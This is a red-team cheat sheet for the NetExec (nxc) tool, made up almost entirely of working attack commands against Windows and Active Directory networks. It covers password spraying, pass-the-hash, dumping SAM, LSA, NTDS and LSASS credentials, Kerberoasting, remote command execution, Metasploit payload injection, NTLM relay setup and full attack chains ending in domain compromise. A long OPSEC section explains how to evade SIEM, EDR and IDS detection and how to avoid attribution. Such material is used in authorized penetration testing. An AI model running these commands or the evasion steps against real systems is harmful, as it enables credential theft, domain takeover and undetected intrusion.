NetExec (nxc) — Red Team Cheat Sheet

⚙

Installation & Syntax

Install (Kali)

sudo apt install netexec

Install (pipx — latest)

pipx install git+https://github.com/Pennyw0rth/NetExec

Universal Syntax

nxc [global opts] <protocol> <target> [opts] [-M module] [-o opts]

Protocols Available

smbldapwinrm wmimssqlssh ftprdpvnc nfs

Target Formats

nxc smb 192.168.1.10 # single IP nxc smb 192.168.1.0/24 # CIDR nxc smb 192.168.1.1-50 # range nxc smb targets.txt # from file nxc smb domain.local # hostname

Key Global Flags

Flag	Description
-t N	threads (default 100)
--timeout N	per-thread timeout (sec)
--jitter N	random delay between requests
--log file.log	save all output to file
--no-progress	disable progress bar
--verbose / --debug	increase output verbosity
-6	force IPv6
--dns-server IP	custom DNS resolver

🔑

Authentication Methods

Password Auth

nxc smb <target> -u USER -p PASS -d DOMAIN

Local Auth (--local-auth)

nxc smb <target> -u admin -p PASS --local-auth

Pass-the-Hash (PTH)

nxc smb <target> -u USER -H <NTLM_HASH> nxc smb <target> -u USER -H LM:NTLM

Kerberos Auth (-k)

nxc smb <target> -u USER -p PASS -k -d DOMAIN nxc smb <target> -u USER --use-kcache -k # use ccache nxc smb <target> -u USER --aesKey KEY -k # AES key export KRB5CCNAME=/tmp/tgt.ccache nxc smb <target> --use-kcache -k

Null / Guest Session

nxc smb <target> -u '' -p '' # null session nxc smb <target> -u guest -p '' # guest nxc ldap <target> -u '' -p '' # anon LDAP bind

From nxcdb (stored creds)

nxc smb <target> -id 1 # use cred ID from DB nxc smb <target> -id 1 2 3 # multiple cred IDs

Defeating LAPS

nxc smb <target> -u USER -p PASS --laps nxc smb <target> -u USER -p PASS --laps 'admin_name'

💧

Password Spraying & Brute Force

Basic Spray

nxc smb <target> -u users.txt -p 'Password123!' --continue-on-success

Paired Lists (user:pass pairs)

nxc smb <target> -u users.txt -p pass.txt --no-bruteforce --continue-on-success

With Jitter (OPSEC)

nxc smb <target> -u users.txt -p 'Pass!' --jitter 5 --continue-on-success

Fail Limit Controls

--gfail-limit 10 # global fail count limit --ufail-limit 3 # per-user fail limit ← lockout safety --fail-limit 5 # per-host fail limit

Check Pass Policy First!

nxc smb <target> -u '' -p '' --pass-pol

⚠ LOCKOUT RISK: Always check --pass-pol before spraying. Use --ufail-limit 1 if policy is strict (e.g., 3 attempts). Spray one password per observation window.

Spray Over WinRM / SSH

nxc winrm <CIDR> -u users.txt -p 'Pass!' --no-bruteforce nxc ssh <target> -u users.txt -p pass.txt --continue-on-success

🔍

SMB Enumeration

Host Discovery

nxc smb 192.168.1.0/24 # live hosts + info nxc smb <CIDR> --gen-relay-list out.txt # SMB signing OFF

Users & Groups

nxc smb <t> -u U -p P --users nxc smb <t> -u U -p P --groups nxc smb <t> -u U -p P --local-users nxc smb <t> -u U -p P --local-groups nxc smb <t> -u '' -p '' --rid-brute # RID enum (null) nxc smb <t> -u U -p P --rid-brute 10000

Shares

nxc smb <t> -u U -p P --shares nxc smb <t> -u U -p P -M spider_plus # spider all shares nxc smb <t> -u U -p P -M spider_plus -o READ_ONLY=false # download all

Sessions & Logged-on Users

nxc smb <t> -u U -p P --sessions nxc smb <t> -u U -p P --loggedon-users nxc smb <t> -u U -p P --lusers

Enum Everything (one shot)

nxc smb <t> -u U -p P \ --groups --local-groups \ --loggedon-users --rid-brute \ --sessions --users --shares \ --pass-pol

File Operations

nxc smb <t> -u U -p P --get-file TARGET_PATH LOCAL_PATH --share SHARE nxc smb <t> -u U -p P --put-file LOCAL_PATH TARGET_PATH --share SHARE

Computers in Domain

nxc smb <t> -u U -p P --computers

Disk Enumeration

nxc smb <t> -u U -p P --disks

GPP Passwords (Group Policy)

nxc smb <t> -u U -p P -M gpp_password nxc smb <t> -u U -p P -M gpp_autologin

Proxychains Support

proxychains -q nxc smb <target> -u U -p P --users

📁

LDAP Enumeration (Preferred — Less Noisy)

Domain Users / Groups / Computers

nxc ldap <DC> -u U -p P --users nxc ldap <DC> -u U -p P --groups nxc ldap <DC> -u U -p P --computers

Domain SID

nxc ldap <DC> -u U -p P -k --get-sid

Kerberoasting

nxc ldap <DC> -u U -p P --kerberoasting output.txt

ASREProasting

nxc ldap <DC> -u U -p P --asreproast output.txt

Delegation Misconfigs

nxc ldap <DC> -u U -p P --find-delegation nxc ldap <DC> -u U -p P --trusted-for-delegation # unconstrained

Password in Description / AdminCount / MAQ

nxc ldap <DC> -u U -p P -M get-desc-users # passwords in descriptions nxc ldap <DC> -u U -p P --admin-count # adminCount=1 objects nxc ldap <DC> -u U -p P -M maq # MachineAccountQuota

GMSA / Pre-2012 Accounts

nxc ldap <DC> -u U -p P --gmsa nxc ldap <DC> -u U -p P -M pre2k

DACL / ACL Read

nxc ldap <DC> -u U -p P --kdcHost <DC> -M daclread -o TARGET=USER ACTION=read nxc ldap <DC> -u U -p P --kdcHost <DC> -M daclread \ -o TARGET_DN="DC=corp,DC=local" ACTION=read RIGHTS=DCSync

✓ OPSEC: Prefer LDAP over SMB for domain enumeration — it generates far less event log noise and avoids touching SMB services.

⚡

Command Execution

CMD Execution (SMB)

nxc smb <t> -u U -p P -x 'whoami'

PowerShell Execution

nxc smb <t> -u U -p P -X 'Get-Process'

Execution Methods (choose explicitly)

--exec-method wmiexec # WMI (default, good opsec) --exec-method atexec # Scheduled Task --exec-method smbexec # Service creation (NOISY) --exec-method mmcexec # MMC20 (stealthiest)

⚠ smbexec creates a Windows service — very noisy, triggers EDR. Prefer wmiexec or mmcexec for stealth.

WinRM Execution

nxc winrm <t> -u U -p P -x 'whoami' nxc winrm <t> -u U -p P -X 'Get-Process'

WMI Direct Execution

nxc wmi <t> -u U -p P -x 'ipconfig'

💀

Credential Dumping

SAM Database

nxc smb <t> -u U -p P --sam

LSA Secrets

nxc smb <t> -u U -p P --lsa

NTDS (Domain Controller)

nxc smb <DC> -u U -p P --ntds # drsuapi (DCSync) nxc smb <DC> -u U -p P --ntds vss # VSS method (shadow copy) nxc smb <DC> -u U -p P -M ntdsutil # ntdsutil method

LSASS (lsassy module)

nxc smb <t> -u U -p P -M lsassy nxc smb <t> -u U -p P -M handlekatz nxc smb <t> -u U -p P -M nanodump

DPAPI (Browser / Credential Manager)

nxc smb <t> -u U -p P --dpapi

MSOL (Azure AD Connect)

nxc smb <t> -u U -p P -M msol

GMSA Secret Decrypt

nxc ldap <DC> -u U -p P --gmsa-decrypt-lsa gmsa_account

🚨 OPSEC: NTDS drsuapi (DCSync) is high-signal. Do DCSync DC-to-DC when possible. VSS method writes to disk — noisier. lsassy touches LSASS memory — EDR alert risk.

🎯

Vulnerability Scanning (Modules)

nxc smb <DC> -u '' -p '' -M zerologon # ZeroLogon nxc smb <DC> -u '' -p '' -M petitpotam # PetitPotam nxc smb <t> -u U -p P -M nopac # noPac / CVE-2021-42278 nxc smb <t> -u U -p P -M printnightmare # PrintNightmare nxc smb <t> -u U -p P -M smbghost # CVE-2020-0796 nxc smb <t> -u '' -p '' -M ms17-010 # EternalBlue nxc smb <t> -u U -p P -M ntlm_reflection # CVE-2025-33073 nxc smb <t> -u U -p P -M webdav # WebDAV check

List / Explore Modules

nxc smb -L # list all SMB modules nxc ldap -L # list LDAP modules nxc smb -M lsassy --options # module options nxc smb -M mimikatz --module-info # module info

🗄

MSSQL

Auth & Query

nxc mssql <t> -u SA -p PASS --local-auth nxc mssql <t> -u U -p P -q 'SELECT name FROM master.dbo.sysdatabases;'

OS Command via xp_cmdshell

nxc mssql <t> -u U -p P -x 'whoami' nxc mssql <t> -u U -p P --put-file local.txt C:\path\remote.txt nxc mssql <t> -u U -p P --get-file C:\path\file.txt local.txt

Privilege Escalation

nxc mssql <t> -u U -p P -M mssql_priv # check SA, impersonation

↔

Lateral Movement & Post-Exploitation

Admin Check Across Network

nxc smb <CIDR> -u USER -H HASH --local-auth # find local admin nxc smb <CIDR> -u USER -p PASS -d DOM # domain admin check

Pass-the-Hash Lateral Movement

nxc smb <CIDR> -u admin -H <NTLM> --local-auth -x 'whoami'

Overpass-the-Hash / Kerberos

nxc smb <t> -u U --aesKey <AES256> -k # preferred over PTH nxc smb <t> -u U -H HASH -k # hash + Kerberos

Empire / Metasploit Integration

nxc smb <t> -u U -p P -M empire_exec -o LISTENER=mylistener nxc smb <t> -u U -p P -M met_inject -o LHOST=IP LPORT=4444

WinRM Remote Shell

nxc winrm <t> -u U -p P -X 'Get-LocalUser'

RDP Check

nxc rdp <t> -u U -p P # check RDP access nxc rdp <CIDR> -u U -p P # sweep

SSH

nxc ssh <t> -u root -p PASS -x 'id' nxc ssh <t> -u U --key-file id_rsa -x 'id'

BloodHound Collection

nxc ldap <DC> -u U -p P -M bloodhound # collect + auto ingest nxc ldap <DC> -u U -p P -M bloodhound \ -o COLLECTION_METHOD=All BLOODHOUND_PATH=/tmp

🗃

nxcdb — Built-in Database

nxcdb # launch interactive DB nxcdb -q "select * from hosts" nxcdb -q "select * from credentials"

Inside nxcdb shell

hosts # list all hosts creds # list credentials export smb # export SMB results creds del <id> # remove credential

✓ TIP: nxc stores every successful auth automatically. Use -id N to reuse saved credentials across sessions — avoids retyping and keeps creds organized.

📡

FTP / NFS / VNC

FTP

nxc ftp <t> -u U -p P --ls # list files nxc ftp <t> -u U -p P --ls folder # list folder nxc ftp <t> -u U -p P --ls folder --get file # download

NFS

nxc nfs <t> --shares # list NFS shares nxc nfs <t> -u U -p P --get-file <path> <local>

VNC

nxc vnc <t> -p PASSWORD # auth check

⛓

Common Attack Chains

Chain 1 — Unauthenticated → Domain Compromise

null session enum → RID brute users → spray 1 password → LDAP enum → Kerberoast → DCSync

nxc smb <DC> -u '' -p '' --rid-brute > users.txt nxc smb <DC> -u users.txt -p 'Winter2024!' --jitter 3 --ufail-limit 1 nxc ldap <DC> -u USER -p PASS --kerberoasting kerbhashes.txt # crack hashes → reuse → nxc smb <DC> -u admin -p cracked --ntds

Chain 2 — Hash Reuse Sweep

dump SAM/LSA → extract hashes → PTH sweep CIDR → exec on admin hosts

nxc smb <t> -u admin -p PASS --sam nxc smb 192.168.1.0/24 -u admin -H <NTLM> --local-auth --continue-on-success

Chain 3 — Relay Setup (No Signing)

find no-signing hosts → gen relay list → ntlmrelayx → pivot

nxc smb 192.168.1.0/24 --gen-relay-list relay.txt ntlmrelayx.py -tf relay.txt -smb2support

Chain 4 — Stealthy Domain Recon

anon LDAP → desc passwords → delegation abuse → BloodHound

nxc ldap <DC> -u '' -p '' --users nxc ldap <DC> -u U -p P -M get-desc-users nxc ldap <DC> -u U -p P --find-delegation nxc ldap <DC> -u U -p P -M bloodhound -o COLLECTION_METHOD=All

🔴

OPSEC — Maintaining Stealth During Operations

🔇 Noise Reduction — Core Controls

Jitter: Always add --jitter 5 (or higher) between requests. Random delays break timing-based detection correlations in SIEMs.

nxc smb <CIDR> -u U -p P --jitter 5 # 0-5s random delay nxc smb <CIDR> -u U -p P --jitter 30 # slower = stealthier

Thread Count: Default is 100 threads — extremely noisy. Drop to 5–10 on sensitive engagements. Defenders see burst auth as an immediate IOC.

nxc smb <CIDR> -u U -p P -t 5 --jitter 10

Fail Limits: Set --ufail-limit 1 or --ufail-limit 2 per user to avoid lockouts and avoid setting off lockout alerting rules.

nxc smb <t> -u users.txt -p pass.txt --ufail-limit 1 --gfail-limit 20

⚙ Execution Method — IOC Comparison

Method	Noise Level	Artifact	Recommended
mmcexec	Lowest	COM object	✓ Stealth
wmiexec	Low	WMI process	✓ Good
atexec	Medium	Sched. Task log	⚠ Careful
smbexec	HIGH	Service install + event	✗ Avoid

nxc smb <t> -u U -p P --exec-method mmcexec -x 'whoami'

🔑 Credential Hygiene

AES over NTLM: When doing Pass-the-Hash, prefer Overpass-the-Hash with AES256 keys via Kerberos. NTLM auth to DCs is more alarming to security teams.

nxc smb <t> -u USER --aesKey <AES256_KEY> -k # overpass-the-hash

Use kcache: Reuse Kerberos tickets from ccache instead of re-authenticating with credentials each time.

export KRB5CCNAME=/tmp/admin.ccache nxc smb <t> -u USER --use-kcache -k

🌐 Infrastructure & Routing OPSEC

Proxy Everything: Route nxc through proxychains/SOCKS to avoid attribution of scan traffic to your direct IP. Never scan from your C2 server directly.

proxychains -q nxc smb <target> -u U -p P --users

Separate IPs per action: If you run scans, phishing, and exploits from the same IP, detection of one collapses all. Use dedicated, ephemeral IPs per operation type.

DNS Ops: Use a custom DNS server to avoid leaking queries to corporate resolvers.

nxc smb <target> --dns-server 8.8.8.8 -u U -p P

🪵 Logging & Evidence Control

Log Everything Locally: Always log nxc output to a file for your own records — helps de-conflict what was done and when.

nxc smb <t> -u U -p P --users --log /tmp/enum_$(date +%F).log

nxc.conf OPSEC Warnings: NetExec warns you before running noisy actions. Do NOT globally disable these — they exist to protect you.

# ~/.nxc/nxc.conf ignore_opsec = False # KEEP THIS FALSE — warnings are valuable

🔬 Stealth Enumeration Priorities

1. LDAP first: Prefer LDAP over SMB for all domain recon — much quieter, no SMB event logs.

2. Read before writing: Get-file, spider, enumerate before any exec or write. Each exec is a potential alert.

3. Null sessions before creds: Exhaust unauthenticated enumeration before burning credentials.

4. Target one host at a time: Scanning /24 simultaneously triggers IDS/NDR. Narrow scope = lower detection probability.

5. DCSync DC-to-DC: If replicating NTDS, route DCSync between DCs rather than from a workstation to a DC — replication between DCs is expected traffic.

📋 OPSEC Pre-Flight Checklist

# Before any spray: nxc smb <DC> -u '' -p '' --pass-pol # 1. Check lockout policy # Confirm: observation window, bad pwd count # Before any exec: # 2. Know which EDR is deployed # 3. Choose exec method accordingly (wmiexec/mmcexec) # 4. Use -t 5 --jitter 10 minimum # 5. Log to file with --log

💡

Pro Tips & Advanced Usage

Custom Port

nxc smb <t> -u U -p P --port 4445

IPv6 Scanning

nxc smb <t> -u U -p P -6

Timeout Tuning

nxc smb <CIDR> --timeout 5 -t 50 # faster but less reliable nxc smb <CIDR> --timeout 30 -t 10 # slow, reliable, stealthy

Kerberoasting + Crack Loop

nxc ldap <DC> -u U -p P --kerberoasting kerb.txt hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

Find Hosts w/ Local Admin (lateral sweep)

nxc smb 10.0.0.0/24 -u admin -H <HASH> --local-auth 2>/dev/null | grep -i pwn3d

Check Module Options Before Running

nxc smb -M lsassy --options # always check first nxc smb <t> -u U -p P -M lsassy -o METHOD=1

Combine Enum Flags Efficiently

nxc smb <t> -u U -p P \ --users --groups --computers \ --shares --pass-pol \ --log full_enum.log

BloodHound + nxc (one shot)

nxc ldap <DC> -u U -p P -M bloodhound \ -o COLLECTION_METHOD=All \ BLOODHOUND_PATH=/tmp/bh/

Filter Only Successful Hits

nxc smb <CIDR> -u U -p P 2>/dev/null | grep -E '\+|-'

Keep nxc Updated

pipx upgrade netexec # always run latest nxc --version

📌

Output Symbols

Symbol	Meaning
[+]	Successful authentication
[-]	Failed authentication
(Pwn3d!)	Admin-level access confirmed
[*]	Informational / status
[!]	Error or OPSEC warning
[OPSEC]	Noisy action — proceed carefully

🔗

Resources

https://www.netexec.wiki/ # official docs https://github.com/Pennyw0rth/NetExec https://github.com/seriotonctf/cme-nxc-cheat-sheet https://pentesting.site/cheat-sheets/netexec/

🔄 Always: run nxc <protocol> --help and nxc <protocol> -L to check your version's options — flags change between releases.

NETEXEC (nxc) COMPLETE CHEAT SHEET + OPSEC GUIDE